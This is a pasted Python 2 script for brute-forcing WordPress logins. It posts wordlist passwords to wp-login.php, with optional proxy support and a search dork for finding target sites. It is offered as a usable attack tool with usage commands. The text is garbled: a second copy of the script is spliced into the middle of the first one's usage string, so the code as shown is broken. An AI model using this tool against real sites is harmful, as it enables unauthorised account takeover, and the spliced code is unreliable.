wordpress bruteforce script in python

1. ReCoded By Kyfx to make a better world :)
2.  
3.  
4. How you do is like this
5.  
6. linux:
7. ./wpbute.py http://site.com/wp-login.php admin common.txt -p 174.143.95.234:80 -v
8. windows :
9. wpbute.py http://site.com/wp-login.php admin common.txt -p 174.143.95.234:80 -v
10. PREVIEWs :
11.  
12.  
13.  
14. #!/usr/bin/python
15.  
16. #WordPress Brute Force (wp-login.php)
17.  
18.  
19.  
20. #If cookies enabled brute force will not work (yet)
21.  
22. #Change response on line 97 if needed. (language)
23.  
24.  
25.  
26. #Dork: inurl:wp-login.php
27.  
28.  
29.  
30. #http://www.darkc0de.com
31.  
32. #d3hydr8[at]gmail[dot]com
33.  
34.  
35.  
36. import urllib2, sys, re, urllib, httplib, socket
37.  
38.  
39.  
40. print "\n d3hydr8[at]gmail[dot]com WordPressBF "
41.  
42. print "----------------------------------------------"
43.  
44.  
45.  
46. if len(sys.argv) not in [4,5,6,7]:
47.  
48. print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\#!/usr/bin/python
49.  
50. #WordPress Brute Force (wp-login.php)
51.  
52.  
53.  
54. #If cookies enabled brute force will not work (yet)
55.  
56. #Change response on line 97 if needed. (language)
57.  
58.  
59.  
60. #Dork: inurl:wp-login.php
61.  
62.  
63.  
64. #http://www.darkc0de.com
65.  
66. #ilyasrobert[at]gmail[dot]com
67.  
68.  
69.  
70. import urllib2, sys, re, urllib, httplib, socket
71.  
72.  
73.  
74. print "\n ilyasrobert[at]gmail[dot]com WordPressBF "
75.  
76. print "----------------------------------------------"
77.  
78.  
79.  
80. if len(sys.argv) not in [4,5,6,7]:
81.  
82. print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
83.  
84. print "\t -p/-proxy <host:port> : Add proxy support"
85.  
86. print "\t -v/-verbose : Verbose Mode\n"
87.  
88. sys.exit(1)
89.  
90.  
91.  
92. for arg in sys.argv[1:]:
93.  
94. if arg.lower() == "-p" or arg.lower() == "-proxy":
95.  
96. proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
97.  
98. if arg.lower() == "-v" or arg.lower() == "-verbose":
99.  
100. verbose = 1
101.  
102.  
103.  
104. try:
105.  
106. if proxy:
107.  
108. print "\n[+] Testing Proxy..."
109.  
110. h2 = httplib.HTTPConnection(proxy)
111.  
112. h2.connect()
113.  
114. print "[+] Proxy:",proxy
115.  
116. except(socket.timeout):
117.  
118. print "\n[-] Proxy Timed Out"
119.  
120. proxy = 0
121.  
122. pass
123.  
124. except(NameError):
125.  
126. print "\n[-] Proxy Not Given"
127.  
128. proxy = 0
129.  
130. pass
131.  
132. except:
133.  
134. print "\n[-] Proxy Failed"
135.  
136. proxy = 0
137.  
138. pass
139.  
140.  
141.  
142. try:
143.  
144. if verbose == 1:
145.  
146. print "[+] Verbose Mode On\n"
147.  
148. except(NameError):
149.  
150. print "[-] Verbose Mode Off\n"
151.  
152. verbose = 0
153.  
154. pass
155.  
156.  
157.  
158. if sys.argv[1][:7] != "http://":
159.  
160. host = "http://"+sys.argv[1]
161.  
162. else:
163.  
164. host = sys.argv[1]
165.  
166.  
167.  
168. print "[+] BruteForcing:",host
169.  
170. print "[+] User:",sys.argv[2]
171.  
172.  
173.  
174. try:
175.  
176. words = open(sys.argv[3], "r").readlines()
177.  
178. print "[+] Words Loaded:",len(words),"\n"
179.  
180. except(IOError):
181.  
182. print "[-] Error: Check your wordlist path\n"
183.  
184. sys.exit(1)
185.  
186.  
187.  
188. for word in words:
189.  
190. word = word.replace("\r","").replace("\n","")
191.  
192. login_form_seq = [
193.  
194. ('log', sys.argv[2]),
195.  
196. ('pwd', word),
197.  
198. ('rememberme', 'forever'),
199.  
200. ('wp-submit', 'Login >>'),
201.  
202. ('redirect_to', 'wp-admin/')]
203.  
204. login_form_data = urllib.urlencode(login_form_seq)
205.  
206. if proxy != 0:
207.  
208. proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
209.  
210. opener = urllib2.build_opener(proxy_handler)
211.  
212. else:
213.  
214. opener = urllib2.build_opener()
215.  
216. try:
217.  
218. site = opener.open(host, login_form_data).read()
219.  
220. except(urllib2.URLError), msg:
221.  
222. print msg
223.  
224. site = ""
225.  
226. pass
227.  
228.  
229.  
230. if re.search("WordPress requires Cookies",site):
231.  
232. print "[-] Failed: WordPress has cookies enabled\n"
233.  
234. sys.exit(1)
235.  
236.  
237.  
238. #Change this response if different. (language)
239.  
240. if re.search("<strong>ERROR</strong>",site) and verbose == 1:
241.  
242. print "[-] Login Failed:",word
243.  
244. else:
245.  
246. print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
247.  
248. sys.exit(1)
249.  
250. print "\n[-] Brute Complete\n"n"
251.  
252. print "\t -p/-proxy <host:port> : Add proxy support"
253.  
254. print "\t -v/-verbose : Verbose Mode\n"
255.  
256. sys.exit(1)
257.  
258.  
259.  
260. for arg in sys.argv[1:]:
261.  
262. if arg.lower() == "-p" or arg.lower() == "-proxy":
263.  
264. proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
265.  
266. if arg.lower() == "-v" or arg.lower() == "-verbose":
267.  
268. verbose = 1
269.  
270.  
271.  
272. try:
273.  
274. if proxy:
275.  
276. print "\n[+] Testing Proxy..."
277.  
278. h2 = httplib.HTTPConnection(proxy)
279.  
280. h2.connect()
281.  
282. print "[+] Proxy:",proxy
283.  
284. except(socket.timeout):
285.  
286. print "\n[-] Proxy Timed Out"
287.  
288. proxy = 0
289.  
290. pass
291.  
292. except(NameError):
293.  
294. print "\n[-] Proxy Not Given"
295.  
296. proxy = 0
297.  
298. pass
299.  
300. except:
301.  
302. print "\n[-] Proxy Failed"
303.  
304. proxy = 0
305.  
306. pass
307.  
308.  
309.  
310. try:
311.  
312. if verbose == 1:
313.  
314. print "[+] Verbose Mode On\n"
315.  
316. except(NameError):
317.  
318. print "[-] Verbose Mode Off\n"
319.  
320. verbose = 0
321.  
322. pass
323.  
324.  
325.  
326. if sys.argv[1][:7] != "http://":
327.  
328. host = "http://"+sys.argv[1]
329.  
330. else:
331.  
332. host = sys.argv[1]
333.  
334.  
335.  
336. print "[+] BruteForcing:",host
337.  
338. print "[+] User:",sys.argv[2]
339.  
340.  
341.  
342. try:
343.  
344. words = open(sys.argv[3], "r").readlines()
345.  
346. print "[+] Words Loaded:",len(words),"\n"
347.  
348. except(IOError):
349.  
350. print "[-] Error: Check your wordlist path\n"
351.  
352. sys.exit(1)
353.  
354.  
355.  
356. for word in words:
357.  
358. word = word.replace("\r","").replace("\n","")
359.  
360. login_form_seq = [
361.  
362. ('log', sys.argv[2]),
363.  
364. ('pwd', word),
365.  
366. ('rememberme', 'forever'),
367.  
368. ('wp-submit', 'Login >>'),
369.  
370. ('redirect_to', 'wp-admin/')]
371.  
372. login_form_data = urllib.urlencode(login_form_seq)
373.  
374. if proxy != 0:
375.  
376. proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
377.  
378. opener = urllib2.build_opener(proxy_handler)
379.  
380. else:
381.  
382. opener = urllib2.build_opener()
383.  
384. try:
385.  
386. site = opener.open(host, login_form_data).read()
387.  
388. except(urllib2.URLError), msg:
389.  
390. print msg
391.  
392. site = ""
393.  
394. pass
395.  
396.  
397.  
398. if re.search("WordPress requires Cookies",site):
399.  
400. print "[-] Failed: WordPress has cookies enabled\n"
401.  
402. sys.exit(1)
403.  
404.  
405.  
406. #Change this response if different. (language)
407.  
408. if re.search("<strong>ERROR</strong>",site) and verbose == 1:
409.  
410. print "[-] Login Failed:",word
411.  
412. else:
413.  
414. print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
415.  
416. sys.exit(1)
417.  
418.  
419. print "\n[-] Brute Complete\n"